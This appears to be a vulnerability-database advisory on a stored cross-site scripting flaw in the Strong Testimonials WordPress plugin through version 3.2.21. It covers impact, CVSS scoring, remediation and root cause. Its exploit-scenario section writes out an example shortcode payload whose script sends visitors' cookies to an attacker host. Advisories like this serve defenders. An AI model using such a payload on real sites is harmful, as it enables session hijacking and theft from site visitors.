Vulnerability Assessment
| Weakness |
CWE
OWASP Top 10:2025
A05:2025 - Injection
ASVS 5.0
V1 - Encoding and Sanitization Output encoding, context-aware escaping
MITRE ATT&CK
2 techniques across 2 tactics: Initial Access, Execution The technique list with ATT&CK links and the kill-chain view is part of the Basic plan and up. |
| Impact | The CVSS v3.1 vector (AV:N/AC:L/PR:L/UI:N/S:C) indicates network-accessible attack vector with low complexity and cross-site scope impact, but requires authenticated access at contributor level or above, which moderates the initial attack surface. The base score of 6.4 reflects medium severity with confidentiality and integrity impact but no availability impact. Real-world risk is elevated by two factors: first, contributor-level access is relatively permissive in many WordPress installations (especially multisite or collaborative environments), and second, stored XSS affecting page context can compromise site integrity, user sessions, and visitor trust at scale. However, the authentication requirement and the need for UI interaction from victims (page visit) prevent this from being a critical remote code execution scenario. Organizations with strict contributor access controls and active security monitoring face lower immediate risk than those with loose permission models or public contributor accounts. |
| Exploit ScenarioDerived | A malicious contributor (or an attacker who compromises a contributor account) creates or edits a WordPress page and embeds a testimonial_view shortcode with a payload such as [testimonial_view attribute='<script>fetch("https://attacker.com/steal?cookie="+document.cookie)</script>'] in the shortcode parameters. Because the plugin fails to escape the attribute value, the script is stored in the database and executed whenever any visitor loads the page, allowing the attacker to harvest session cookies or redirect users to a phishing site. No specialized exploit code is required beyond knowledge of WordPress shortcode syntax and basic JavaScript injection techniques. |
Get an e-mail when this CVE is exploited, patched or re-scored. Free account.
Alert meAnalysisAIv1 – Apr 08, 2026
Stored cross-site scripting in Strong Testimonials WordPress plugin up to version 3.2.21 allows authenticated contributors and above to inject arbitrary JavaScript via the testimonial_view shortcode due to insufficient input sanitization and output escaping. Injected scripts execute in the context of any user viewing the affected page, enabling session hijacking, credential theft, or malware distribution. No public exploit code or active exploitation has been identified at time of analysis.
RemediationAI
Update the Strong Testimonials plugin immediately to the patched version released after 3.2.21. Check the WordPress plugin repository or Wordfence advisory (https://www.wordfence.com/threat-intel/vulnerabilities/id/88d769cd-bea8-42e4-80a8-a77c0699b50c?source=cve) for the exact fix version number. As a temporary mitigation, restrict contributor-level access to only trusted users and regularly audit published pages and shortcodes for suspicious content. Additionally, implement WordPress security hardening measures such as content security policy (CSP) headers to mitigate stored XSS impact if exploitation occurs before patching.
Affected VersionsENISA
Affected Packages
Source: OSV (Open Source Vulnerabilities)
Affects your stack
Affects 1 package in euvd
Checking this CVE against your own stacks and servers is part of the Basic plan and up.
Technical ContextAI · show details
The vulnerability exists in the testimonial_view shortcode handler within the Strong Testimonials plugin (CPE: cpe:2.3:a:wpchill:strong_testimonials:*:*:*:*:*:*:*:*), which processes user-supplied shortcode attributes without proper sanitization before rendering them to the page output. The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation), a common class of XSS vulnerabilities. WordPress shortcodes are a template mechanism that accepts parameters; when these parameters are not escaped before output, an attacker can inject malicious HTML and JavaScript. The vulnerability is classified as stored (persistent) because the malicious payload persists in the WordPress database as part of the page content, affecting all users who view the compromised page rather than just the attacker's session.
Know when Strong Testimonials gets its next vulnerability
- Watch products and get an email when something new is published
- Check this CVE against your own stack and servers
- Exploit and PoC references, threat intelligence from 22 sources
No credit card · 7-day full trial
Severity by source
AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Primary rating from Vendor (Wordfence) · only source for this CVE.
CVSS VectorVendor: Wordfence
DescriptionCVE.org
The Strong Testimonials plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's testimonial_view shortcode in all versions up to, and including, 3.2.21 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
Threat Intelligence Overview
How this decision was reached
The engine reads each signal below and applies a fixed list of rules from top to bottom. The first rule that matches sets the recommended action – like a statement, every line is shown.
What every action level means
SSVC AssessmentENISA
Priority Score
Attack Technique
Cross-Site Scripting occurs when an application accepts untrusted data and sends it to a web browser without proper validation or encoding.
More in Strong Testimonials
View allStored XSS in the Strong Testimonials plugin before 2.40.1 for WordPress can result in an attacker performing malicious
The Strong Testimonials WordPress plugin before 3.1.12 does not validate and escape some of its Testimonial fields befor
Stored cross-site scripting in the Strong Testimonials WordPress plugin (all versions through 3.3.11) can let unauthenti
Stored cross-site scripting in the Strong Testimonials WordPress plugin through version 3.3.12 allows an attacker to pla
Cross-site scripting in the Strong Testimonials WordPress plugin (versions through 3.3.11) lets an authenticated attacke
Stored cross-site scripting in the WP Chill Strong Testimonials WordPress plugin, affecting all versions through 3.3.15,
Authenticated attackers with contributor-level access can inject persistent JavaScript into WordPress sites running Stro
Authenticated attackers holding only low-privilege WordPress accounts can abuse improperly enforced access controls in t
Auth. Rated medium severity (CVSS 5.4), this vulnerability is remotely exploitable, low attack complexity. No vendor pat
Missing Authorization vulnerability in WP Chill Strong Testimonials strong-testimonials.1.16. Rated medium severity (CVS
The Strong Testimonials plugin for WordPress is vulnerable to unauthorized modification of data due to an improper capab
Cross-Site Request Forgery (CSRF) vulnerability in WPChill Strong Testimonials.1.10. Rated medium severity (CVSS 4.3), t
EUVD-2026-20038
GHSA-5mxp-jr6r-r378
NVD
CVE.org
EPSS
Vulnrichment
VulDB
Exploit-DB